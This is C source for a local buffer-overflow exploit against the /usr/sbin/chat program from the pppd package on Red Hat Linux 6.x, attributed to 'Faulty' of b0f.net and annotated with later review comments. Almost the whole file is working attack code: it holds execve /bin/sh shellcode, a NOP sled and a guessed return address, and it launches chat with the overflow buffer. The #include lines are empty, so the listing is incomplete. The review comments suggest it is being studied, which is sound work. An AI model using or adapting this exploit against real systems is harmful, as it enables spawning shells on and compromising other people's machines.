/*
 * A buffer overflow exists in the /usr/sbin/chat program
 * this comes as part of the pppd package which is installed
 * by default on Redhat linux and proberly others tested on
 * Redhat 6.2 proberly works on redhat 6.x - 8.x and any
 * other linux with this package installed.
 * NOTE : THIS PROGRAM IS NOT SUID BY DEFAULT
 * Faulty - www.b0f.net
 * b0fnet@yahoo.com
 */

/* NOTE(review): the three header names were lost when this listing was
 * extracted (the angle-bracketed names were stripped as markup), so the
 * directives below are incomplete as written. The page does not say which
 * headers the original named. */
#include
#include
#include

#define BSIZE 1032   /* default length of the argument buffer; argv[1] overrides it */
#define ALIGN 0      /* moves the payload copy further down the buffer, in bytes */
#define OFFSET 0     /* subtracted from get_sp() to form the address stored in the buffer */

/* Payload bytes that main() copies into the argument buffer just below the
 * two address slots. Its length is taken with strlen(), so the array must
 * not contain an embedded NUL before its terminator. */
unsigned char shellcode[] =
    "\xeb\x16\x31\xdb\x31\xc9\xf7\xe1"
    "\x5b\xb0\x0b\x88\x53\x07\x52\x53"
    "\x89\xe1\xcd\x80\xb0\x01\xcd\x80"
    "\xe8\xe5\xff\xff\xff/bin/sh";

/* Captures the current stack pointer (32-bit x86 only).
 * There is no C return statement: the value is left in %eax by the asm and
 * reaches the caller only because %eax is the return register by ABI
 * convention. As far as the C standard is concerned this is undefined
 * behavior, and it depends on the compiler/flags the author used. */
unsigned long get_sp(void)
{
    __asm__("movl %esp, %eax");
}

/* Builds one bsize-byte argument and passes it to /usr/sbin/chat.
 * argv[1], if present, overrides BSIZE. The function only returns 0 when
 * execl() fails (on success the process image is replaced); execl's return
 * value is not checked. */
int main(int argc, char **argv)
{
    char *buffer;
    int i;               /* unused */
    int bsize = BSIZE;
    int align = ALIGN;
    int offset = OFFSET;
    unsigned long addr;

    /* NOTE(review): atoi() is unchecked. A non-numeric, zero, negative or
     * very small argv[1] makes malloc(bsize) and the buffer[bsize - 4] /
     * buffer[bsize - 8] stores below index outside the allocation. */
    if(argc > 1)
        bsize = atoi(argv[1]);

    buffer = (char *)malloc(bsize);   /* NOTE(review): result is not checked for NULL */
    bzero(buffer, bsize);             /* redundant: the memset below overwrites every byte */
    memset(buffer, 0x90, bsize);

    /* Address written into the last two 4-byte slots of the buffer.
     * NOTE(review): this assumes the target process's stack sits at the same
     * address as this process's; stack-address randomization breaks that
     * assumption. */
    addr = get_sp() - offset;
    *(unsigned long *)&buffer[bsize - 4] = addr;   /* type-punned store through a char buffer */
    *(unsigned long *)&buffer[bsize - 8] = addr;

    printf("/usr/sbin/chat Sploit by Faulty www.b0f.net\n");

    /* Payload is placed immediately below the two address slots.
     * NOTE(review): if strlen(shellcode) + 8 + align exceeds bsize the
     * destination pointer lands before buffer[0] -- an out-of-bounds write
     * in this program itself. */
    memcpy(buffer + bsize - 8 - align - strlen(shellcode), shellcode, strlen(shellcode));

    /* The terminating vararg should be (char *)NULL for execl(); a bare
     * NULL is not portable where NULL expands to a plain integer. */
    execl("/usr/sbin/chat", "chat", buffer, NULL);
    return 0;
}